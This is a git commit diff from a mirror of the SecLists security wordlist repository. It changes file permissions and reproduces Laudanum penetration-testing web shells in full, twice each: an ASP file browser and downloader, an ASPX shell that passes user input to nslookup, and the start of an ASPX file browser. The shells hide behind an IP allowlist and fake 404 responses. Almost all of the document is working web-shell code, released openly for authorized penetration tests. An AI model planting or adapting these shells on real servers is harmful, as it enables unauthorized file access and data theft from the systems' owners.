mirror of
https://github.com/danielmiessler/SecLists.git
synced 2024-08-15 13:50:35 +03:00
Set file permissions
This commit is contained in:
parent
307f703b8f
commit
7018c294f5
0
Web-Shells/WordPress/access.php
Normal file → Executable file
0
Web-Shells/WordPress/access.php
Normal file → Executable file
0
Web-Shells/laudanum-0.8/CREDITS
Executable file → Normal file
0
Web-Shells/laudanum-0.8/CREDITS
Executable file → Normal file
0
Web-Shells/laudanum-0.8/GPL
Executable file → Normal file
0
Web-Shells/laudanum-0.8/GPL
Executable file → Normal file
0
Web-Shells/laudanum-0.8/README
Executable file → Normal file
0
Web-Shells/laudanum-0.8/README
Executable file → Normal file
@ -1,179 +1,179 @@
|
||||
<%@Language="VBScript"%>
|
||||
<%Option Explicit%>
|
||||
<%Response.Buffer = True%>
|
||||
<%
|
||||
' *******************************************************************************
|
||||
' ***
|
||||
' *** Laudanum Project
|
||||
' *** A Collection of Injectable Files used during a Penetration Test
|
||||
' ***
|
||||
' *** More information is available at:
|
||||
' *** http://laudanum.secureideas.net
|
||||
' *** laudanum@secureideas.net
|
||||
' ***
|
||||
' *** Project Leads:
|
||||
' *** Kevin Johnson <kjohnson@secureideas.net
|
||||
' *** Tim Medin <tim@securitywhole.com>
|
||||
' ***
|
||||
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||
' ***
|
||||
' ********************************************************************************
|
||||
' ***
|
||||
' *** This file provides access to the file system.
|
||||
' *** Written by Tim Medin <timmedin@gmail.com>
|
||||
' ***
|
||||
' ********************************************************************************
|
||||
' *** This program is free software; you can redistribute it and/or
|
||||
' *** modify it under the terms of the GNU General Public License
|
||||
' *** as published by the Free Software Foundation; either version 2
|
||||
' *** of the License, or (at your option) any later version.
|
||||
' ***
|
||||
' *** This program is distributed in the hope that it will be useful,
|
||||
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
' *** GNU General Public License for more details.
|
||||
' ***
|
||||
' *** You can get a copy of the GNU General Public License from this
|
||||
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
' *** You can also write to the Free Software Foundation, Inc., Temple
|
||||
' *** Place - Suite Boston, MA USA.
|
||||
' ***
|
||||
' ***************************************************************************** */
|
||||
|
||||
' ***************** Config entries below ***********************
|
||||
|
||||
' Define variables
|
||||
Dim allowedIPs
|
||||
Dim allowed
|
||||
Dim filepath
|
||||
Dim file
|
||||
Dim stream
|
||||
Dim path
|
||||
Dim i
|
||||
Dim fso
|
||||
Dim folder
|
||||
Dim list
|
||||
Dim temppath
|
||||
|
||||
' IPs are enterable as individual addresses TODO: add CIDR support
|
||||
allowedIPs = "192.168.0.1,127.0.0.1,::1"
|
||||
' Just in cace you added a space in the line above
|
||||
allowedIPs = replace(allowedIPS," ","")
|
||||
'turn it into an array
|
||||
allowedIPs = split(allowedIPS,",") '
|
||||
' make sure the ip is allowed
|
||||
allowed = 0
|
||||
for i = lbound(allowedIPs) to ubound(allowedIPs)
|
||||
if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
|
||||
allowed = 1
|
||||
exit for
|
||||
end if
|
||||
next
|
||||
' send a 404 if the IP Address is not allowed
|
||||
if allowed = 0 then
|
||||
Response.Status = "404 File Not Found"
|
||||
Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
|
||||
Response.End
|
||||
end if
|
||||
|
||||
' create file object for use everywhere
|
||||
set fso = CreateObject("Scripting.FileSystemObject")
|
||||
|
||||
' download a file if selected
|
||||
filepath = trim(Request.QueryString("file"))
|
||||
'validate file
|
||||
if len(filepath) > 0 then
|
||||
if fso.FileExists(filepath) then
|
||||
'valid file
|
||||
|
||||
Set file = fso.GetFile(filepath)
|
||||
Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name
|
||||
'Response.AddHeader "Content-Length", file.Size
|
||||
Response.ContentType = "application/octet-stream"
|
||||
set stream = Server.CreateObject("ADODB.Stream")
|
||||
stream.Open
|
||||
stream.Type = 1
|
||||
Response.Charset = "UTF-8"
|
||||
stream.LoadFromFile(file.Path)
|
||||
' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb.
|
||||
Response.BinaryWrite(stream.Read)
|
||||
stream.Close
|
||||
set stream = Nothing
|
||||
set file = Nothing
|
||||
Response.End
|
||||
end if
|
||||
end if
|
||||
|
||||
' begin rendering the page
|
||||
%>
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum ASP File Browser</title>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<h1>Laudanum File Browser 0.1</h1>
|
||||
|
||||
<%
|
||||
' get the path to work with, if it isn't set or valid then start with the web root
|
||||
' goofy if statement is used since vbscript doesn't use short-curcuit logic
|
||||
path = trim(Request.QueryString("path"))
|
||||
if len(path) = 0 then
|
||||
path = fso.GetFolder(Server.MapPath("\"))
|
||||
elseif not fso.FolderExists(path) then
|
||||
path = fso.GetFolder(Server.MapPath("\"))
|
||||
end if
|
||||
|
||||
set folder = fso.GetFolder(path)
|
||||
|
||||
' Special locations, webroot and drives
|
||||
%><b>Other Locations:</b> <%
|
||||
for each i in fso.Drives
|
||||
if i.IsReady then
|
||||
%><a href="<%=Request.ServerVariables("URL") & "?path=" & i.DriveLetter%>:\"><%=i.DriveLetter%>:</a> <%
|
||||
end if
|
||||
next
|
||||
%><a href="<%=Request.ServerVariables("URL")%>">web root</a><br/><%
|
||||
|
||||
' Information on folder
|
||||
%><h2>Listing of: <%
|
||||
list = split(folder.path, "\")
|
||||
temppath = ""
|
||||
for each i in list
|
||||
temppath = temppath & i & "\"
|
||||
%><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(temppath)%>"><%=i%>\</a> <%
|
||||
next
|
||||
%></h2><%
|
||||
|
||||
' build table for listing
|
||||
%><table>
|
||||
<tr><th align="left">Name</th><th>Size</th><th>Modified</th><th>Accessed</th><th>Created</th></tr><%
|
||||
' Parent Path if it exists
|
||||
if not folder.IsRootFolder then
|
||||
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(folder.ParentFolder.Path)%>">..</a></td><%
|
||||
end if
|
||||
|
||||
' Get the folders
|
||||
set list = folder.SubFolders
|
||||
for each i in list
|
||||
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(i.Path)%>"><%=i.Name%>\</a></td></tr><%
|
||||
next
|
||||
|
||||
' Get the files
|
||||
set list = folder.Files
|
||||
for each i in list
|
||||
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?file=" & Server.URLEncode(i.Path)%>"><%=i.Name%></a></td><td align="right"><%=FormatNumber(i.Size, 0)%></td><td align="right"><%=i.DateLastModified%></td><td align="right"><%=i.DateLastAccessed%></td><td align="right"><%=i.DateCreated%></td></tr><%
|
||||
next
|
||||
|
||||
' all done
|
||||
%>
|
||||
</table>
|
||||
<hr/>
|
||||
<address>
|
||||
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
<%@Language="VBScript"%>
|
||||
<%Option Explicit%>
|
||||
<%Response.Buffer = True%>
|
||||
<%
|
||||
' *******************************************************************************
|
||||
' ***
|
||||
' *** Laudanum Project
|
||||
' *** A Collection of Injectable Files used during a Penetration Test
|
||||
' ***
|
||||
' *** More information is available at:
|
||||
' *** http://laudanum.secureideas.net
|
||||
' *** laudanum@secureideas.net
|
||||
' ***
|
||||
' *** Project Leads:
|
||||
' *** Kevin Johnson <kjohnson@secureideas.net
|
||||
' *** Tim Medin <tim@securitywhole.com>
|
||||
' ***
|
||||
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||
' ***
|
||||
' ********************************************************************************
|
||||
' ***
|
||||
' *** This file provides access to the file system.
|
||||
' *** Written by Tim Medin <timmedin@gmail.com>
|
||||
' ***
|
||||
' ********************************************************************************
|
||||
' *** This program is free software; you can redistribute it and/or
|
||||
' *** modify it under the terms of the GNU General Public License
|
||||
' *** as published by the Free Software Foundation; either version 2
|
||||
' *** of the License, or (at your option) any later version.
|
||||
' ***
|
||||
' *** This program is distributed in the hope that it will be useful,
|
||||
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
' *** GNU General Public License for more details.
|
||||
' ***
|
||||
' *** You can get a copy of the GNU General Public License from this
|
||||
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
' *** You can also write to the Free Software Foundation, Inc., Temple
|
||||
' *** Place - Suite Boston, MA USA.
|
||||
' ***
|
||||
' ***************************************************************************** */
|
||||
|
||||
' ***************** Config entries below ***********************
|
||||
|
||||
' Define variables
|
||||
Dim allowedIPs
|
||||
Dim allowed
|
||||
Dim filepath
|
||||
Dim file
|
||||
Dim stream
|
||||
Dim path
|
||||
Dim i
|
||||
Dim fso
|
||||
Dim folder
|
||||
Dim list
|
||||
Dim temppath
|
||||
|
||||
' IPs are enterable as individual addresses TODO: add CIDR support
|
||||
allowedIPs = "192.168.0.1,127.0.0.1,::1"
|
||||
' Just in cace you added a space in the line above
|
||||
allowedIPs = replace(allowedIPS," ","")
|
||||
'turn it into an array
|
||||
allowedIPs = split(allowedIPS,",") '
|
||||
' make sure the ip is allowed
|
||||
allowed = 0
|
||||
for i = lbound(allowedIPs) to ubound(allowedIPs)
|
||||
if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
|
||||
allowed = 1
|
||||
exit for
|
||||
end if
|
||||
next
|
||||
' send a 404 if the IP Address is not allowed
|
||||
if allowed = 0 then
|
||||
Response.Status = "404 File Not Found"
|
||||
Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
|
||||
Response.End
|
||||
end if
|
||||
|
||||
' create file object for use everywhere
|
||||
set fso = CreateObject("Scripting.FileSystemObject")
|
||||
|
||||
' download a file if selected
|
||||
filepath = trim(Request.QueryString("file"))
|
||||
'validate file
|
||||
if len(filepath) > 0 then
|
||||
if fso.FileExists(filepath) then
|
||||
'valid file
|
||||
|
||||
Set file = fso.GetFile(filepath)
|
||||
Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name
|
||||
'Response.AddHeader "Content-Length", file.Size
|
||||
Response.ContentType = "application/octet-stream"
|
||||
set stream = Server.CreateObject("ADODB.Stream")
|
||||
stream.Open
|
||||
stream.Type = 1
|
||||
Response.Charset = "UTF-8"
|
||||
stream.LoadFromFile(file.Path)
|
||||
' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb.
|
||||
Response.BinaryWrite(stream.Read)
|
||||
stream.Close
|
||||
set stream = Nothing
|
||||
set file = Nothing
|
||||
Response.End
|
||||
end if
|
||||
end if
|
||||
|
||||
' begin rendering the page
|
||||
%>
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum ASP File Browser</title>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<h1>Laudanum File Browser 0.1</h1>
|
||||
|
||||
<%
|
||||
' get the path to work with, if it isn't set or valid then start with the web root
|
||||
' goofy if statement is used since vbscript doesn't use short-curcuit logic
|
||||
path = trim(Request.QueryString("path"))
|
||||
if len(path) = 0 then
|
||||
path = fso.GetFolder(Server.MapPath("\"))
|
||||
elseif not fso.FolderExists(path) then
|
||||
path = fso.GetFolder(Server.MapPath("\"))
|
||||
end if
|
||||
|
||||
set folder = fso.GetFolder(path)
|
||||
|
||||
' Special locations, webroot and drives
|
||||
%><b>Other Locations:</b> <%
|
||||
for each i in fso.Drives
|
||||
if i.IsReady then
|
||||
%><a href="<%=Request.ServerVariables("URL") & "?path=" & i.DriveLetter%>:\"><%=i.DriveLetter%>:</a> <%
|
||||
end if
|
||||
next
|
||||
%><a href="<%=Request.ServerVariables("URL")%>">web root</a><br/><%
|
||||
|
||||
' Information on folder
|
||||
%><h2>Listing of: <%
|
||||
list = split(folder.path, "\")
|
||||
temppath = ""
|
||||
for each i in list
|
||||
temppath = temppath & i & "\"
|
||||
%><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(temppath)%>"><%=i%>\</a> <%
|
||||
next
|
||||
%></h2><%
|
||||
|
||||
' build table for listing
|
||||
%><table>
|
||||
<tr><th align="left">Name</th><th>Size</th><th>Modified</th><th>Accessed</th><th>Created</th></tr><%
|
||||
' Parent Path if it exists
|
||||
if not folder.IsRootFolder then
|
||||
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(folder.ParentFolder.Path)%>">..</a></td><%
|
||||
end if
|
||||
|
||||
' Get the folders
|
||||
set list = folder.SubFolders
|
||||
for each i in list
|
||||
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(i.Path)%>"><%=i.Name%>\</a></td></tr><%
|
||||
next
|
||||
|
||||
' Get the files
|
||||
set list = folder.Files
|
||||
for each i in list
|
||||
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?file=" & Server.URLEncode(i.Path)%>"><%=i.Name%></a></td><td align="right"><%=FormatNumber(i.Size, 0)%></td><td align="right"><%=i.DateLastModified%></td><td align="right"><%=i.DateLastAccessed%></td><td align="right"><%=i.DateCreated%></td></tr><%
|
||||
next
|
||||
|
||||
' all done
|
||||
%>
|
||||
</table>
|
||||
<hr/>
|
||||
<address>
|
||||
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
@ -1,144 +1,144 @@
|
||||
<%@ Page Language="C#"%>
|
||||
<%@ Import Namespace="System" %>
|
||||
<html><head><title>Laudanum - DNS</title></head><body>
|
||||
<script runat="server">
|
||||
|
||||
/* *****************************************************************************
|
||||
***
|
||||
*** Laudanum Project
|
||||
*** A Collection of Injectable Files used during a Penetration Test
|
||||
***
|
||||
*** More information is available at:
|
||||
*** http://laudanum.secureideas.com
|
||||
*** laudanum@secureideas.com
|
||||
***
|
||||
*** Project Leads:
|
||||
*** Kevin Johnson <kevin@secureideas.com>
|
||||
***
|
||||
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||
***
|
||||
********************************************************************************
|
||||
***
|
||||
*** This file provides shell access to DNS on the system.
|
||||
*** Written by James Jardine <james@secureideas.com>
|
||||
***
|
||||
********************************************************************************
|
||||
*** This program is free software; you can redistribute it and/or
|
||||
*** modify it under the terms of the GNU General Public License
|
||||
*** as published by the Free Software Foundation; either version 2
|
||||
*** of the License, or (at your option) any later version.
|
||||
***
|
||||
*** This program is distributed in the hope that it will be useful,
|
||||
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
*** GNU General Public License for more details.
|
||||
***
|
||||
*** You can get a copy of the GNU General Public License from this
|
||||
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||
***
|
||||
***************************************************************************** */
|
||||
|
||||
// ********************* Config entries below ***********************************
|
||||
// IPs are enterable as individual addresses
|
||||
string[] allowedIPs = new string[3] { "::1", "192.168.1.1", "127.0.0.1" };
|
||||
|
||||
// ***************** No editable content below this line **************************
|
||||
|
||||
string stdout = "";
|
||||
string stderr = "";
|
||||
string[] qtypes = "Any,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV".Split(',');
|
||||
void die() {
|
||||
//HttpContext.Current.Response.Clear();
|
||||
HttpContext.Current.Response.StatusCode = 404;
|
||||
HttpContext.Current.Response.StatusDescription = "Not Found";
|
||||
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
|
||||
HttpContext.Current.Server.ClearError();
|
||||
HttpContext.Current.Response.End();
|
||||
}
|
||||
|
||||
void Page_Load(object sender, System.EventArgs e) {
|
||||
// check if the X-Fordarded-For header exits
|
||||
string remoteIp;
|
||||
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
|
||||
remoteIp = Request.UserHostAddress;
|
||||
} else {
|
||||
remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
|
||||
}
|
||||
|
||||
bool validIp = false;
|
||||
foreach (string ip in allowedIPs) {
|
||||
validIp = (validIp || (remoteIp == ip));
|
||||
}
|
||||
|
||||
if (!validIp) {
|
||||
die();
|
||||
}
|
||||
|
||||
|
||||
string qType = "Any";
|
||||
bool validType = false;
|
||||
if (Request.Form["type"] != null)
|
||||
{
|
||||
qType = Request.Form["type"].ToString();
|
||||
foreach (string s in qtypes)
|
||||
{
|
||||
if (s == qType)
|
||||
{
|
||||
validType = true;
|
||||
break;
|
||||
}
|
||||
}
|
||||
if (!validType)
|
||||
qType = "Any";
|
||||
}
|
||||
|
||||
|
||||
if (Request.Form["query"] != null)
|
||||
{
|
||||
string query = Request.Form["query"].Replace(" ", string.Empty).Replace(" ", string.Empty);
|
||||
|
||||
if(query.Length > 0)
|
||||
{
|
||||
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("nslookup", "-type=" + qType + " " + query);
|
||||
// The following commands are needed to redirect the standard output and standard error.
|
||||
procStartInfo.RedirectStandardOutput = true;
|
||||
procStartInfo.RedirectStandardError = true;
|
||||
procStartInfo.UseShellExecute = false;
|
||||
|
||||
// Do not create the black window.
|
||||
procStartInfo.CreateNoWindow = true;
|
||||
|
||||
// Now we create a process, assign its ProcessStartInfo and start it
|
||||
System.Diagnostics.Process p = new System.Diagnostics.Process();
|
||||
p.StartInfo = procStartInfo;
|
||||
p.Start();
|
||||
// Get the output and error into a string
|
||||
stdout = p.StandardOutput.ReadToEnd();
|
||||
stderr = p.StandardError.ReadToEnd();
|
||||
}
|
||||
}
|
||||
}
|
||||
</script>
|
||||
<form method="post">
|
||||
QUERY: <input type="text" name="query"/><br />
|
||||
Type: <select name="type">
|
||||
<%
|
||||
foreach (string s in qtypes)
|
||||
{
|
||||
Response.Write("<option value=\"" + s + "\">" + s + "</option>");
|
||||
}
|
||||
%>
|
||||
</select>
|
||||
<input type="submit"><br/>
|
||||
STDOUT:<br/>
|
||||
<pre><% = stdout.Replace("<", "<") %></pre>
|
||||
<br/>
|
||||
<br/>
|
||||
<br/>
|
||||
STDERR:<br/>
|
||||
<pre><% = stderr.Replace("<", "<") %></pre>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<%@ Page Language="C#"%>
|
||||
<%@ Import Namespace="System" %>
|
||||
<html><head><title>Laudanum - DNS</title></head><body>
|
||||
<script runat="server">
|
||||
|
||||
/* *****************************************************************************
|
||||
***
|
||||
*** Laudanum Project
|
||||
*** A Collection of Injectable Files used during a Penetration Test
|
||||
***
|
||||
*** More information is available at:
|
||||
*** http://laudanum.secureideas.com
|
||||
*** laudanum@secureideas.com
|
||||
***
|
||||
*** Project Leads:
|
||||
*** Kevin Johnson <kevin@secureideas.com>
|
||||
***
|
||||
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||
***
|
||||
********************************************************************************
|
||||
***
|
||||
*** This file provides shell access to DNS on the system.
|
||||
*** Written by James Jardine <james@secureideas.com>
|
||||
***
|
||||
********************************************************************************
|
||||
*** This program is free software; you can redistribute it and/or
|
||||
*** modify it under the terms of the GNU General Public License
|
||||
*** as published by the Free Software Foundation; either version 2
|
||||
*** of the License, or (at your option) any later version.
|
||||
***
|
||||
*** This program is distributed in the hope that it will be useful,
|
||||
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
*** GNU General Public License for more details.
|
||||
***
|
||||
*** You can get a copy of the GNU General Public License from this
|
||||
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||
***
|
||||
***************************************************************************** */
|
||||
|
||||
// ********************* Config entries below ***********************************
|
||||
// IPs are enterable as individual addresses
|
||||
string[] allowedIPs = new string[3] { "::1", "192.168.1.1", "127.0.0.1" };
|
||||
|
||||
// ***************** No editable content below this line **************************
|
||||
|
||||
string stdout = "";
|
||||
string stderr = "";
|
||||
string[] qtypes = "Any,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV".Split(',');
|
||||
void die() {
|
||||
//HttpContext.Current.Response.Clear();
|
||||
HttpContext.Current.Response.StatusCode = 404;
|
||||
HttpContext.Current.Response.StatusDescription = "Not Found";
|
||||
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
|
||||
HttpContext.Current.Server.ClearError();
|
||||
HttpContext.Current.Response.End();
|
||||
}
|
||||
|
||||
void Page_Load(object sender, System.EventArgs e) {
|
||||
// check if the X-Fordarded-For header exits
|
||||
string remoteIp;
|
||||
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
|
||||
remoteIp = Request.UserHostAddress;
|
||||
} else {
|
||||
remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
|
||||
}
|
||||
|
||||
bool validIp = false;
|
||||
foreach (string ip in allowedIPs) {
|
||||
validIp = (validIp || (remoteIp == ip));
|
||||
}
|
||||
|
||||
if (!validIp) {
|
||||
die();
|
||||
}
|
||||
|
||||
|
||||
string qType = "Any";
|
||||
bool validType = false;
|
||||
if (Request.Form["type"] != null)
|
||||
{
|
||||
qType = Request.Form["type"].ToString();
|
||||
foreach (string s in qtypes)
|
||||
{
|
||||
if (s == qType)
|
||||
{
|
||||
validType = true;
|
||||
break;
|
||||
}
|
||||
}
|
||||
if (!validType)
|
||||
qType = "Any";
|
||||
}
|
||||
|
||||
|
||||
if (Request.Form["query"] != null)
|
||||
{
|
||||
string query = Request.Form["query"].Replace(" ", string.Empty).Replace(" ", string.Empty);
|
||||
|
||||
if(query.Length > 0)
|
||||
{
|
||||
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("nslookup", "-type=" + qType + " " + query);
|
||||
// The following commands are needed to redirect the standard output and standard error.
|
||||
procStartInfo.RedirectStandardOutput = true;
|
||||
procStartInfo.RedirectStandardError = true;
|
||||
procStartInfo.UseShellExecute = false;
|
||||
|
||||
// Do not create the black window.
|
||||
procStartInfo.CreateNoWindow = true;
|
||||
|
||||
// Now we create a process, assign its ProcessStartInfo and start it
|
||||
System.Diagnostics.Process p = new System.Diagnostics.Process();
|
||||
p.StartInfo = procStartInfo;
|
||||
p.Start();
|
||||
// Get the output and error into a string
|
||||
stdout = p.StandardOutput.ReadToEnd();
|
||||
stderr = p.StandardError.ReadToEnd();
|
||||
}
|
||||
}
|
||||
}
|
||||
</script>
|
||||
<form method="post">
|
||||
QUERY: <input type="text" name="query"/><br />
|
||||
Type: <select name="type">
|
||||
<%
|
||||
foreach (string s in qtypes)
|
||||
{
|
||||
Response.Write("<option value=\"" + s + "\">" + s + "</option>");
|
||||
}
|
||||
%>
|
||||
</select>
|
||||
<input type="submit"><br/>
|
||||
STDOUT:<br/>
|
||||
<pre><% = stdout.Replace("<", "<") %></pre>
|
||||
<br/>
|
||||
<br/>
|
||||
<br/>
|
||||
STDERR:<br/>
|
||||
<pre><% = stderr.Replace("<", "<") %></pre>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
@ -1,154 +1,154 @@
|
||||
<%@ Page Language="C#"%>
|
||||
<%@ Import Namespace="System" %>
|
||||
<html><head><title>Laudanum - File</title></head><body>
|
||||
<script runat="server">
|
||||
|
||||
/* *****************************************************************************
|
||||
***
|
||||
*** Laudanum Project
|
||||
*** A Collection of Injectable Files used during a Penetration Test
|
||||
***
|
||||
*** More information is available at:
|
||||
*** http://laudanum.secureideas.com
|
||||
*** laudanum@secureideas.com
|
||||
***
|
||||
*** Project Leads:
|
||||
*** Kevin Johnson <kevin@secureideas.com>
|
||||
***
|
||||
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||
***
|
||||
********************************************************************************
|
||||
***
|
||||
*** This file allows browsing of the file system
|
||||
*** Written by James Jardine <james@secureideas.com>
|
||||
***
|
||||
********************************************************************************
|
||||
*** This program is free software; you can redistribute it and/or
|
||||
*** modify it under the terms of the GNU General Public License
|
||||
*** as published by the Free Software Foundation; either version 2
|
||||
*** of the License, or (at your option) any later version.
|
||||
***
|
||||
*** This program is distributed in the hope that it will be useful,
|
||||
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
*** GNU General Public License for more details.
|
||||
***
|
||||
*** You can get a copy of the GNU General Public License from this
|
||||
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||
********************************************************************************* */
|
||||
|
||||
// ********************* Config entries below ***********************************
|
||||
// IPs are enterable as individual addresses
|
||||
string[] allowedIPs = new string[3] {"::1", "192.168.1.1","127.0.0.1"};
|
||||
|
||||
// ***************** No editable content below this line **************************
|
||||
bool allowed = false;
|
||||
string dir = "";
|
||||
string file = "";
|
||||
|
||||
void Page_Load(object sender, System.EventArgs e)
|
||||
{
|
||||
|
||||
foreach (string ip in allowedIPs)
|
||||
{
|
||||
if (HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"] == ip)
|
||||
{
|
||||
allowed = true;
|
||||
}
|
||||
}
|
||||
|
||||
if (!allowed)
|
||||
{
|
||||
die();
|
||||
}
|
||||
|
||||
//dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Environment.SystemDirectory;
|
||||
dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Server.MapPath(".");
|
||||
file = Request.QueryString["file"] != null ? Request.QueryString["file"] : "";
|
||||
|
||||
if (file.Length > 0)
|
||||
{
|
||||
if (System.IO.File.Exists(file))
|
||||
{
|
||||
writefile();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
void writefile()
|
||||
{
|
||||
Response.ClearContent();
|
||||
Response.Clear();
|
||||
Response.ContentType = "text/plain";
|
||||
//Uncomment the next line if you would prefer to download the file vs display it.
|
||||
//Response.AddHeader("Content-Disposition", "attachment; filename=" + file + ";");
|
||||
Response.TransmitFile(file);
|
||||
Response.Flush();
|
||||
Response.End();
|
||||
}
|
||||
|
||||
void die() {
|
||||
//HttpContext.Current.Response.Clear();
|
||||
HttpContext.Current.Response.StatusCode = 404;
|
||||
HttpContext.Current.Response.StatusDescription = "Not Found";
|
||||
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
|
||||
HttpContext.Current.Server.ClearError();
|
||||
HttpContext.Current.Response.End();
|
||||
}
|
||||
|
||||
|
||||
</script>
|
||||
<html>
|
||||
<head></head>
|
||||
<% string[] breadcrumbs = dir.Split('\\');
|
||||
string breadcrumb = "";
|
||||
foreach (string b in breadcrumbs)
|
||||
{
|
||||
if (b.Length > 0)
|
||||
{
|
||||
breadcrumb += b + "\\";
|
||||
Response.Write("<a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(breadcrumb) + "\">" + Server.HtmlEncode(b) + "</a>");
|
||||
Response.Write(" / ");
|
||||
}
|
||||
}
|
||||
%>
|
||||
<table>
|
||||
<tr><th>Name</th><th>Date</th><th>Size</th></tr>
|
||||
<%
|
||||
try
|
||||
{
|
||||
if (System.IO.Directory.Exists(dir))
|
||||
{
|
||||
string[] folders = System.IO.Directory.GetDirectories(dir);
|
||||
foreach (string folder in folders)
|
||||
{
|
||||
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(folder) + "\">" + Server.HtmlEncode(folder) + "</a></td><td></td><td></td></tr>");
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir));
|
||||
Response.End();
|
||||
}
|
||||
|
||||
}
|
||||
catch (System.UnauthorizedAccessException ex)
|
||||
{
|
||||
Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir));
|
||||
Response.End();
|
||||
}
|
||||
%>
|
||||
|
||||
<%
|
||||
System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir);
|
||||
System.IO.FileInfo[] files = di.GetFiles();
|
||||
foreach (System.IO.FileInfo f in files)
|
||||
{
|
||||
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(dir) + "&file=" + Server.UrlEncode(f.FullName) + "\">" + Server.HtmlEncode(f.Name) + "</a></td><td>" + f.CreationTime.ToString() + "</td><td>" + f.Length.ToString() + "</td></tr>");
|
||||
}
|
||||
%>
|
||||
</table>
|
||||
</body>
|
||||
<%@ Page Language="C#"%>
|
||||
<%@ Import Namespace="System" %>
|
||||
<html><head><title>Laudanum - File</title></head><body>
|
||||
<script runat="server">
|
||||
|
||||
/* *****************************************************************************
|
||||
***
|
||||
*** Laudanum Project
|
||||
*** A Collection of Injectable Files used during a Penetration Test
|
||||
***
|
||||
*** More information is available at:
|
||||
*** http://laudanum.secureideas.com
|
||||
*** laudanum@secureideas.com
|
||||
***
|
||||
*** Project Leads:
|
||||
*** Kevin Johnson <kevin@secureideas.com>
|
||||
